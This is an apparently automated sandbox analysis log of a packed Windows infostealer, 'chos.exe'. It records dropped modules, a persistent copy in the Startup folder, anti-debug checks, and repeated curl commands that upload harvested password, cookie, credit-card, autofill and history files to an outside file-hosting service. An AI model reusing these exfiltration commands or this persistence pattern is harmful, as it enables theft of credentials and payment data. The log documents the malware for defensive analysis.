Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Util\_cpuid_c.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_10-18286
Source: C:\Users\user\Desktop\chos.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-17410

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF666DD83B0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DD92F0 FindFirstFileExW,FindClose,	0_2_00007FF666DD92F0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF666DF18E4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7392F0 FindFirstFileExW,FindClose,	10_2_00007FF7FD7392F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7383B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	10_2_00007FF7FD7383B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7518E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	10_2_00007FF7FD7518E4

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\

Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^C
Source: chos.exe, 00000000.00000003.1429956767.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: chos.exe, 00000011.00000003.1701143564.00000211B7C7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW15
Source: curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000009.00000003.1626863027.000001791A305000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg
Source: curl.exe, 0000000D.00000003.1653123473.000001C952E15000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW
Source: curl.exe, 00000010.00000003.1680740824.000001DB46B86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC

Source: C:\Users\user\Desktop\chos.exe

Code function: 0_2_00007FF666DEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF666DEA684

Source: C:\Users\user\Desktop\chos.exe

Code function: 0_2_00007FF666DF34F0 GetProcessHeap,

0_2_00007FF666DF34F0

Source: C:\Windows\System32\tasklist.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF666DDC910
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF666DEA684
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DDD37C SetUnhandledExceptionFilter,	0_2_00007FF666DDD37C
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF666DDD19C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD74A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FF7FD74A684
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD73C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF7FD73C910
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD73D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FF7FD73D19C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD73D37C SetUnhandledExceptionFilter,	10_2_00007FF7FD73D37C

Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Users\user\Desktop\chos.exe "C:\Users\user\Desktop\chos.exe"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile

Source: C:\Users\user\Desktop\chos.exe

Code function: 0_2_00007FF666DF95E0 cpuid

0_2_00007FF666DF95E0

Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info\licenses VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography-44.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chos.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools VolumeInformation	Jump to behavior
